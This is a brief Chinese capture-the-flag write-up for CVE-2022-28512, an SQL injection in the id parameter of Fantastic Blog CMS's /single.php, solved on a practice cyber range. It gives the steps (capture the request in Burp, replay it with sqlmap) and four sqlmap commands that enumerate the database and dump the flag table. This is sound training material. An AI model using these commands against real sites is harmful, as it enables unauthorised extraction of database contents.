CVE-2022-28512 春秋云境.com
靶标介绍:
Fantastic Blog (CMS)是一个绝对出色的博客/文章网络内容管理系统。它使您可以轻松地管理您的网站或博客,它为您提供了广泛的功能来定制您的博客以满足您的需求。它具有强大的功能,您无需接触任何代码即可启动并运行您的博客。 该CMS的/single.php路径下,id参数存在一个SQL注入漏洞。
- 注册账号登录系统
- 构造题目已知的漏洞链接
- burp抓包并保存数据包。
- txt带入到sqlmap跑数据库、数据表、flag。
库名:python sqlmap.py -r C:\Users\CISP-PTE\Desktop\sing.txt --dbs --batch
表名:python sqlmap.py -r C:\Users\CISP-PTE\Desktop\sing.txt -D ctf --tables --batch
字段名:python sqlmap.py -r C:\Users\CISP-PTE\Desktop\sing.txt -D ctf -T flag --columns --batch
字段值:python sqlmap.py -r C:\Users\CISP-PTE\Desktop\sing.txt -D ctf -T flag -C flag --dump --batch